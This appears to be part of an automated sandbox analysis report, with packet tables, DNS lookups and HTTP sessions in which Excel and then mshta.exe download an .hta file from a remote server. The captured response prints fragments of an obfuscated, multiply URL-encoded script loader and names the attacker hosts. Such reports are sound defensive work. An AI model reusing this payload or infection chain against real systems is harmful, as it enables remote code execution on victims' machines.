Oct 24, 2024 21:24:03.093281984 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.248204947 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.253742933 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:03.253806114 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.255458117 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.260883093 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:03.260935068 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.266417027 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.455794096 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.455921888 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.456209898 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.456254005 CEST	49196	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.461369991 CEST	80	49196	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.901882887 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.907578945 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.907696009 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.909286976 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.915967941 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:04.916021109 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:04.921550035 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:07.129631042 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:07.129726887 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.135689974 CEST	80	49197	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:07.135757923 CEST	49197	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.345247030 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.350755930 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:07.350810051 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.352407932 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.357922077 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:07.357975006 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:07.363687038 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:08.466027021 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:08.466124058 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.472218037 CEST	80	49198	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:08.472287893 CEST	49198	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.598411083 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.604269981 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:08.604347944 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.605921030 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.611371994 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:08.611452103 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:08.617224932 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:09.780390024 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:09.780519962 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:09.786398888 CEST	80	49199	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:09.786462069 CEST	49199	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:10.042963982 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:10.048487902 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:10.048547029 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:10.050141096 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:10.055634975 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:10.055685043 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:10.062429905 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:14.272247076 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:14.272409916 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.278170109 CEST	80	49200	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:14.278217077 CEST	49200	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.414475918 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.419914007 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:14.419986963 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.421621084 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.427457094 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:14.427514076 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:14.433092117 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:15.557713032 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:15.557828903 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.563775063 CEST	80	49201	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:15.563854933 CEST	49201	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.719069958 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.724710941 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:15.724883080 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.726511002 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.731833935 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:15.731889009 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:15.737225056 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:16.929487944 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:16.929589987 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:16.936122894 CEST	80	49202	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:16.936181068 CEST	49202	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:17.087064028 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:17.092426062 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:17.092508078 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:17.094152927 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:17.099478960 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:17.099666119 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:17.104985952 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:18.131926060 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:18.132065058 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.138995886 CEST	80	49203	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:18.139065981 CEST	49203	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.276009083 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.281733036 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:18.281810999 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.283521891 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.288844109 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:18.288921118 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:18.294306040 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:19.432138920 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:19.432343006 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.438432932 CEST	80	49204	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:19.438500881 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.572053909 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.577728987 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:19.577783108 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.579586983 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.584975958 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:19.585022926 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:19.590840101 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:20.593719959 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:20.593841076 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:20.599685907 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:20.599745989 CEST	49205	80	192.168.2.22	94.156.177.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 21:22:35.327449083 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 24, 2024 21:22:35.347071886 CEST	53	54562	8.8.8.8	192.168.2.22
Oct 24, 2024 21:22:40.920448065 CEST	52917	53	192.168.2.22	8.8.8.8
Oct 24, 2024 21:22:40.942683935 CEST	53	52917	8.8.8.8	192.168.2.22
Oct 24, 2024 21:23:00.587378025 CEST	62751	53	192.168.2.22	8.8.8.8
Oct 24, 2024 21:23:00.597500086 CEST	53	62751	8.8.8.8	192.168.2.22
Oct 24, 2024 21:23:02.042622089 CEST	57893	53	192.168.2.22	8.8.8.8
Oct 24, 2024 21:23:02.054250956 CEST	53	57893	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 21:22:35.327449083 CEST	192.168.2.22	8.8.8.8	0xa298	Standard query (0)	mpa.li	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:22:40.920448065 CEST	192.168.2.22	8.8.8.8	0xd610	Standard query (0)	mpa.li	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:23:00.587378025 CEST	192.168.2.22	8.8.8.8	0xbf62	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:23:02.042622089 CEST	192.168.2.22	8.8.8.8	0xf308	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 21:22:35.347071886 CEST	8.8.8.8	192.168.2.22	0xa298	No error (0)	mpa.li	5.159.62.244	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:22:35.347071886 CEST	8.8.8.8	192.168.2.22	0xa298	No error (0)	mpa.li	5.159.62.243	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:22:40.942683935 CEST	8.8.8.8	192.168.2.22	0xd610	No error (0)	mpa.li	5.159.62.243	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:22:40.942683935 CEST	8.8.8.8	192.168.2.22	0xd610	No error (0)	mpa.li	5.159.62.244	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:23:00.597500086 CEST	8.8.8.8	192.168.2.22	0xbf62	No error (0)	drive.google.com	142.250.186.46	A (IP address)	IN (0x0001)	false
Oct 24, 2024 21:23:02.054250956 CEST	8.8.8.8	192.168.2.22	0xf308	No error (0)	drive.usercontent.google.com	172.217.16.193	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mpa.li

drive.google.com

drive.usercontent.google.com

192.3.176.141

94.156.177.220

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	192.3.176.141	80	3596	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:22:36.997385979 CEST	382	OUT	GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 21:22:37.664978981 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:22:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:36:51 GMT ETag: "20a11-6252e32d56015" Accept-Ranges: bytes Content-Length: 133649 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED] Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScriPT%252520LAnGuAGE%25253D%252522VbSCriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
Oct 24, 2024 21:22:37.665040016 CEST	1236	IN	Data Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
Oct 24, 2024 21:22:37.665079117 CEST	424	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Oct 24, 2024 21:22:37.665113926 CEST	1236	IN	Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 42 7a 4f 68 74 53 6c 41 7a 65 5a 56 6f 65 6f 78 4a 5a 79 41 56 6e 58 76 70 61 6b 77 75 47 56 55 77 Data Ascii: %252520%252520%252520%252520%252520%252520%252520BzOhtSlAzeZVoeoxJZyAVnXvpakwuGVUwBHNTnznvSkPcvqnzVOuNlIDiDjGtZZlRmIhtQzhisyOPfDJJRoZNXqcnILtYObRBpUijMLDCmQNPoDgexZjkEzosZTDwgFkqtsMEhKXqioIqfRZyvXTtpKInkHgemkJYgdPSkaJoPTsHNVKErkZCmxFLVeXjltKoi
Oct 24, 2024 21:22:37.665150881 CEST	1236	IN	Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
Oct 24, 2024 21:22:37.665184975 CEST	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
Oct 24, 2024 21:22:37.665220022 CEST	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
Oct 24, 2024 21:22:37.665307045 CEST	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Oct 24, 2024 21:22:37.665344954 CEST	1060	IN	Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
Oct 24, 2024 21:22:37.665411949 CEST	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Oct 24, 2024 21:22:37.671220064 CEST	1236	IN	Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	192.3.176.141	80	3868	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:22:42.559612989 CEST	459	OUT	GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.176.141 If-Range: "20a11-6252e32d56015"
Oct 24, 2024 21:22:43.229069948 CEST	1236	IN	HTTP/1.1 206 Partial Content Date: Thu, 24 Oct 2024 19:22:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:36:51 GMT ETag: "20a11-6252e32d56015" Accept-Ranges: bytes Content-Length: 124753 Content-Range: bytes 8896-133648/133649 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 [TRUNCATED] Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Oct 24, 2024 21:22:43.229163885 CEST	1236	IN	Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
Oct 24, 2024 21:22:43.229202986 CEST	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
Oct 24, 2024 21:22:43.229238033 CEST	1236	IN	Data Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
Oct 24, 2024 21:22:43.229274035 CEST	848	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Oct 24, 2024 21:22:43.229309082 CEST	1236	IN	Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
